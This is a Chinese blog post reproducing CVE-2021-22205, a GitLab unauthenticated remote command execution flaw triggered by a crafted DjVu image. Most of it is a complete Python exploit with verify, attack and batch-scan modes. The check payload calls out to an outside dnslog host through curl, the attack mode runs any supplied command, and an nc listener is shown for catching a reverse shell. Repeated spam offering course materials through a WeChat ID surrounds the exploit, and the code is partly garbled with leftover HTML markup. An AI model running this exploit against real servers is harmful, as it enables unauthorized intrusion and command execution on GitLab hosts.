CVE-2021-22205——Gitlab 远程命令执行漏洞复现,2024年最新美团架构师深入讲解网络安全开发

最新推荐文章于 2024-07-27 09:11:54 发布
最新推荐文章于 2024-07-27 09:11:54 发布
阅读量241 收藏
点赞数 2
分类专栏: 2024年程序员学习 文章标签: web安全 gitlab 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76225520/article/details/137853942
版权

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
img

正文

nc监听10000端口

nc -lvp 10000
  • 1

成功上线
在这里插入图片描述

执行命令RCE
在这里插入图片描述

Exp

import requests
from bs4 import BeautifulSoup
import base64
import random
import sys
import os
import argparse

requests.packages.urllib3.disable_warnings()

def title():
print(“”"

/ / / | | / / | | | | / | |
| | / /| | ) | | | |) | | ) | ) | ) | | | |
| | V / | ||/ /| |_| / /| |/ / / / / /| || |) |
| / || ||/|_| ||||/|_/

                                <span class="token variable">Author</span><span class="token punctuation">:</span><span class="token variable">Al1ex</span><span class="token punctuation">@</span><span class="token variable">Heptagram</span>
                            <span class="token variable">Github</span><span class="token punctuation">:</span><span class="token variable">https</span><span class="token punctuation">:</span><span class="token punctuation">/</span><span class="token punctuation">/</span><span class="token variable">github</span><span class="token punctuation">.</span><span class="token variable">com</span><span class="token punctuation">/</span><span class="token variable">Al1ex</span>                             
	<span class="token string">""</span><span class="token punctuation">"</span><span class="token punctuation">)</span>
<span class="token variable">print</span><span class="token punctuation">(</span><span class="token string">''</span><span class="token punctuation">'</span>
    <span class="token variable">验证模式:python</span> <span class="token variable">CVE-</span><span class="token number">2021</span><span class="token variable">-</span><span class="token number">22205.</span><span class="token variable">py</span> <span class="token variable">-v</span> <span class="token boolean">true</span> <span class="token variable">-t</span> <span class="token variable">target_url</span> 
    <span class="token variable">攻击模式:python</span> <span class="token variable">CVE-</span><span class="token number">2021</span><span class="token variable">-</span><span class="token number">22205.</span><span class="token variable">py</span> <span class="token variable">-a</span> <span class="token boolean">true</span> <span class="token variable">-t</span> <span class="token variable">target_url</span> <span class="token variable">-c</span> <span class="token variable">command</span> 
    <span class="token variable">批量检测:python</span> <span class="token variable">CVE-</span><span class="token number">2021</span><span class="token variable">-</span><span class="token number">22205.</span><span class="token variable">py</span> <span class="token variable">-s</span> <span class="token boolean">true</span> <span class="token variable">-f</span> <span class="token variable">file</span> 
    <span class="token string">''</span><span class="token punctuation">'</span><span class="token punctuation">)</span>

def check(target_url):
session = requests.Session()
try:
req1 = session.get(target_url.strip(“/”) + “/users/sign_in”, verify=False)
soup = BeautifulSoup(req1.text, features=“lxml”)
token = soup.findAll(‘meta’)[16].get(“content”)
data = “\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=“file”; filename=“test.jpg”\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3”?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright “\n” . qx{curl whoami.82sm53.dnslog.cn} . \n" b “) ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5–\r\n\r\n”
headers = {

“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36”,
“Connection”: “close”,
“Content-Type”: “multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5”,
“X-CSRF-Token”: f"{token}“, “Accept-Encoding”: “gzip, deflate”}
flag = ‘Failed to process image’
req2 = session.post(target_url.strip(”/“) + “/uploads/user”, data=data, headers=headers, verify=False)
if flag in req2.text:
print(”[+] 目标 {} 存在漏洞".format(target_url))
else:
print(“[-] 目标 {} 不存在漏洞”.format(target_url))
except Exception as e:
print(e)

def attack(target_url,command):
session = requests.Session()
try:
req1 = session.get(target_url.strip(“/”) + “/users/sign_in”, verify=False)
soup = BeautifulSoup(req1.text, features=“lxml”)
token = soup.findAll(‘meta’)[16].get(“content”)
data = “\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=“file”; filename=“test.jpg”\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3”?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright “\n” . qx{“+ command +”} . \n" b “) ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5–\r\n\r\n”
headers = {

“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36”,
“Connection”: “close”,
“Content-Type”: “multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5”,
“X-CSRF-Token”: f"{token}“, “Accept-Encoding”: “gzip, deflate”}
flag = ‘Failed to process image’
req2 = session.post(target_url.strip(”/“) + “/uploads/user”, data=data, headers=headers, verify=False)
if flag in req2.text:
print(”[+] 目标 {} 存在漏洞".format(target_url))
print(“[+] 请到dnslog或主机检查执行结果”)
else:
print(“[-] 目标 {} 不存在漏洞”.format(target_url))
except Exception as e:
print(e)

def scan(file):
for url_link in open(file, ‘r’, encoding=‘utf-8’):
if url_link.strip() != ‘’:
url_path = format_url(url_link.strip())
check(url_path)

def format_url(url):
try:
if url[:4] != “http”:
url = “https://” + url
url = url.strip()
return url
except Exception as e:
print(‘URL 错误 {0}’.format(url))

def main():
parser = argparse.ArgumentParser(description=‘GitLab < 13.10.3 RCE’)
parser.add_argument(’-v’, ‘–verify’, type=bool,help=’ 验证模式 ‘)
parser.add_argument(’-t’, ‘–target’, type=str, help=’ 目标URL ')

<span class="token variable">parser</span><span class="token punctuation">.</span><span class="token variable">add_argument</span><span class="token punctuation">(</span><span class="token string">'-a'</span><span class="token punctuation">,</span> <span class="token string">'--attack'</span><span class="token punctuation">,</span> <span class="token variable">type</span><span class="token punctuation">=</span><span class="token variable">bool</span><span class="token punctuation">,</span> <span class="token variable">help</span><span class="token punctuation">=</span><span class="token string">' 攻击模式 '</span><span class="token punctuation">)</span>
<span class="token variable">parser</span><span class="token punctuation">.</span><span class="token variable">add_argument</span><span class="token punctuation">(</span><span class="token string">'-c'</span><span class="token punctuation">,</span> <span class="token string">'--command'</span><span class="token punctuation">,</span> <span class="token variable">type</span><span class="token punctuation">=</span><span class="token variable">str</span><span class="token punctuation">,</span> <span class="token variable">help</span><span class="token punctuation">=</span><span class="token string">' 执行命令 '</span><span class="token punctuation">)</span>

<span class="token variable">parser</span><span class="token punctuation">.</span><span class="token variable">add_argument</span><span class="token punctuation">(</span><span class="token string">'-s'</span><span class="token punctuation">,</span> <span class="token string">'--scan'</span><span class="token punctuation">,</span> <span class="token variable">type</span><span class="token punctuation">=</span><span class="token variable">bool</span><span class="token punctuation">,</span> <span class="token variable">help</span><span class="token punctuation">=</span><span class="token string">' 批量模式 '</span><span class="token punctuation">)</span>
<span class="token variable">parser</span><span class="token punctuation">.</span><span class="token variable">add_argument</span><span class="token punctuation">(</span><span class="token string">'-f'</span><span class="token punctuation">,</span> <span class="token string">'--file'</span><span class="token punctuation">,</span> <span class="token variable">type</span><span class="token punctuation">=</span><span class="token variable">str</span><span class="token punctuation">,</span> <span class="token variable">help</span><span class="token punctuation">=</span><span class="token string">' 文件路径 '</span><span class="token punctuation">)</span>


<span class="token variable">args</span> <span class="token punctuation">=</span> <span class="token variable">parser</span><span class="token punctuation">.</span><span class="token variable">parse_args</span><span class="token punctuation">(</span><span class="token punctuation">)</span>

<span class="token variable">verify_model</span> <span class="token punctuation">=</span> <span class="token variable">args</span><span class="token punctuation">.</span><span class="token variable">verify</span>
<span class="token variable">target_url</span>   <span class="token punctuation">=</span> <span class="token variable">args</span><span class="token punctuation">.</span><span class="token variable">target</span>

<span class="token variable">attack_model</span> <span class="token punctuation">=</span> <span class="token variable">args</span><span class="token punctuation">.</span><span class="token variable">attack</span>
<span class="token variable">command</span> <span class="token punctuation">=</span> <span class="token variable">args</span><span class="token punctuation">.</span><span class="token variable">command</span>

<span class="token variable">scan_model</span> <span class="token punctuation">=</span> <span class="token variable">args</span><span class="token punctuation">.</span><span class="token variable">scan</span>
<span class="token variable">file</span> <span class="token punctuation">=</span> <span class="token variable">args</span><span class="token punctuation">.</span><span class="token variable">file</span>

<span class="token variable">if</span> <span class="token variable">verify_model</span> <span class="token variable">is</span> <span class="token variable">True</span> <span class="token variable">and</span> <span class="token variable">target_url</span> <span class="token punctuation">!</span><span class="token punctuation">=</span><span class="token variable">None</span><span class="token punctuation">:</span>
    <span class="token variable">check</span><span class="token punctuation">(</span><span class="token variable">target_url</span><span class="token punctuation">)</span>
<span class="token variable">elif</span> <span class="token variable">attack_model</span> <span class="token variable">is</span> <span class="token variable">True</span> <span class="token variable">and</span> <span class="token variable">target_url</span> <span class="token punctuation">!</span><span class="token punctuation">=</span> <span class="token variable">None</span> <span class="token variable">and</span> <span class="token variable">command</span> <span class="token punctuation">!</span><span class="token punctuation">=</span> <span class="token variable">None</span><span class="token punctuation">:</span>
    <span class="token variable">attack</span><span class="token punctuation">(</span><span class="token variable">target_url</span><span class="token punctuation">,</span><span class="token variable">command</span><span class="token punctuation">)</span>
<span class="token variable">elif</span> <span class="token variable">scan_model</span> <span class="token variable">is</span> <span class="token variable">True</span> <span class="token variable">and</span> <span class="token variable">file</span> <span class="token punctuation">!</span><span class="token punctuation">=</span> <span class="token variable">None</span><span class="token punctuation">:</span>
    <span class="token variable">scan</span><span class="token punctuation">(</span><span class="token variable">file</span><span class="token punctuation">)</span>
<span class="token variable">else</span><span class="token punctuation">:</span>
    <span class="token variable">sys</span><span class="token punctuation">.</span><span class="token variable">exit</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span>

if name == ‘main’:
title()
main()

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44
  • 45
  • 46
  • 47
  • 48
  • 49
  • 50
  • 51
  • 52
  • 53
  • 54
  • 55
  • 56
  • 57
  • 58
  • 59
  • 60
  • 61
  • 62
  • 63
  • 64
  • 65
  • 66
  • 67
  • 68
  • 69
  • 70
  • 71
  • 72
  • 73
  • 74
  • 75
  • 76
  • 77
  • 78
  • 79
  • 80
  • 81
  • 82
  • 83
  • 84
  • 85
  • 86
  • 87
  • 88
  • 89
  • 90
  • 91
  • 92
  • 93
  • 94
  • 95
  • 96
  • 97
  • 98
  • 99
  • 100
  • 101
  • 102
  • 103
  • 104
  • 105
  • 106
  • 107
  • 108
  • 109

学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
img

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

/7a04c5d629f1415a9e35662316578e07.png#pic_center)

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
[外链图片转存中…(img-kS6uaov6-1713312854442)]

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

说又槐
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现CVE-2021-22205 GitLab 远程命令执行漏洞(RCE)
做自己喜欢的事,并将其发挥到极致!
11-05 2290
0x01 漏洞背景描述 20214⽉15⽇,GitLab官方发布安全补丁更新修复了GitLab命令执行漏洞CVE-2021- 22205)。由于GitLab中的ExifTool没有对传⼊的图像文件的扩展名进行正确处理,攻击者通过 上传特制的恶意图片,可以在目标服务器上执行任意命令,且发现由于GitLab存在未授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用,社区版(CE)和企业版(EE)皆受影 响,CVSS评分为9.9。 GitLab 是一个基于 Web 的 DevOps 生命周期工具,它提
Gitlab无需认证RCE漏洞复现CVE-2021-22205
千寻的博客
11-15 4058
文章目录gitlab介绍漏洞介绍漏洞编号漏洞等级影响版本FOFA 查询环境搭建(vulhub环境搭建)漏洞复现第一步 漏洞检测第二步 dnslog解析第三步 服务器写入文件第三步 反弹shell修复建议免责声明摘抄 gitlab介绍 GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。 GitLab 是一个用于仓库管理系统的开源项目,使用 Git 作为代码管理工具,并在此基础上搭建起来的 Web服务。 漏洞介绍 由于 GitL
GitLab 中 GitHub 导入 API 存在远程代码执行漏洞
OSCS开源安全社区
09-01 326
OSCS(开源软件供应链安全社区)通过最快、最全的方式,发布开源项目最新安全风险动态,包括开源组件安全漏洞、事件等信息。GitLab 的受影响版本中存在远程代码执行漏洞,此漏洞CVE-2022-2884 相似,允许经过身份验证的用户通过从 GitHub API 端点导入来实现远程代码执行GitLab 是由 GitLab 公司开发的、基于 Git 的集成软件开发平台。升级GitLab到15.1.6或更高版本。升级GitLab到15.2.4或更高版本。升级GitLab到15.3.2或更高版本。...
CVE-2021-22205——Gitlab 远程命令执行漏洞复现
LiBai'S BLOG
11-10 8976
CVE-2021-22205Vuln Impact影响版本环境Fofa语法漏洞利用脚本反弹ShellEXP Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a .
认识漏洞-GitLab 远程命令执行漏洞、致远OA-ajax.do未授权任意文件上传漏洞
最新发布
Boom!脑洞大爆炸的博客
07-27 282
认识漏洞-GitLab 远程命令执行漏洞、致远OA-ajax.do未授权任意文件上传漏洞
GitLab 远程命令执行漏洞复现及坑点解决——CVE-2021-22205
cfzy_2024的博客
03-27 868
GitLab 没有正确验证传递给文件解析器的图像文件,攻击者可利用该漏洞在服务端进行远程命令执行漏洞编号CVE-2021-22205
Gitlab 远程命令执行漏洞CVE-2021-22205)分析
技术超强的网络安全平台
10-30 5219
0x01 前言 GitLab 是由GitLab Inc.开发的一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,可通过Web界面访问公开或私人项目。由于GitLab存在未授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用。 0x02 漏洞分析 未授权的端口在于用户注册:https://xx.xx.xx.xx/users/sign_up   还可以滥用Gitlab API接口列出所有项目(包括私有项目) https:/...
CVE-2021-22205:GitLab 远程命令执行漏洞
weixin_38896449的博客
12-07 4236
1、漏洞介绍 近日,GitLab远程代码执行漏洞(CVE-2021-22205) 被广泛利用。该漏洞是由于GitLab没有正确处理传入的图像文件,造成某些端点的路径存在无需授权的风险,攻击者可以在无需认证的情况下构造恶意图片文件并上传到GitLab,从而执行远程命令,导致服务器敏感信息泄露。 受影响版本 11.9 <= Gitlab CE/EE < 13.8.8 13.9 <= Gitlab CE/EE < 13.9.6 13.10 <= Gitlab CE/EE &
GitLab 远程命令执行漏洞复现CVE-2021-22205
weixin_59086772的博客
01-10 1403
雨笋教育小编今天分享我们工程师发布的关于GitLab 远程命令执行漏洞复现的一篇技术干货,分享给你们一起学习。 GitLab 官方发布安全补丁更新修复了GitLab命令执行漏洞CVE-2021- 22205)。由于GitLab中的ExifTool没有对传⼊的图像文件的扩展名进行正确处理,攻击者通过 上传特制的恶意图片,可以在目标服务器上执行任意命令,且发现由于GitLab存在未授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用,影响了从 11.9 开始的版本。 0x00漏洞描述 GitLa
apache stucts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具
04-21
检测一个url命令为 python3 CVE-2022-22954-POC.py -u http://test.com 检测多个url命令为 python3 CVE-2022-22954-POC.py -f file.txt(把url按一行一个保存到file.txt中) 结果有可能如下
详细分析GitLab CE 已遭在野利用漏洞 (CVE-2021-22205)
smellycat000的专栏
10-27 3546
聚焦源代码安全,网罗国内外最新资讯!作者:Piergiovanni Cipolloni编译:代码卫士HN Security 团队指出,几个月前,客户在自己的 GitLab CE 服务器上...
2024最全网络安全-一句话木马(1),顺利拿到offer
2301_79985178的博客
05-05 367
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。
GitLab 远程命令执行漏洞(CVE-2021-22205)
weixin_42299610的博客
06-02 1316
GitLab 远程命令执行漏洞(CVE-2021-22205)
CVE-2021-22205 GitLab 远程命令执行漏洞复现
ierciyuan的博客
07-30 4993
CVE-2021-22205 GitLab 远程命令执行漏洞复现。vulhub靶场+使用poc/exp测试利用。
漏洞预警:gitlab命令执行CVE-2021-22205
热门推荐
weixin_43526443的博客
12-06 6万+
——D&X安全实验室 目录 Part1 漏洞描述 Part2 危害等级 Part3 漏洞影响 Part4 漏洞分析及验证 (1)使用vulhub搭建环境。 2)利用脚本 3)查看回显 Part5 修复建议 Part1 漏洞描述 GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。 由于 GitLab 没有正确验证传递给文件解析器的图像文件...
GitLab 远程命令执行漏洞复现(CVE-2021-22205)
Bird&Bird
12-02 4405
目录一、漏洞描述二、影响版本三、环境搭建四、漏洞复现4.1、脚本复现4.1.1、下载利用脚本 一、漏洞描述 GitLab 没有正确验证传递给文件解析器的图像文件,这导致远程命令执行,可执行系统命令。这是一个严重的问题。它现在在最新版本中得到缓解,漏洞编号CVE-2021-22205。 二、影响版本 11.9 <= GitLab(CE/EE)< 13.8.8 13.9 <= GitLab(CE/EE)< 13.9.6 13.10 <= GitLab(CE/EE)< 13
F5 BIG-IP IQ 2021漏洞CVE-2021-22986:远程代码执行风险
### CVE-2021-22986: F5 BIG-IP-IQ 的远程代码执行漏洞分析 **背景**: CVE-2021-22986是一个针对F5 BIG-IP设备及其附属产品BIG-IP IQ(Intelligence Query)的安全漏洞。该漏洞允许攻击者通过不安全的API调用,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值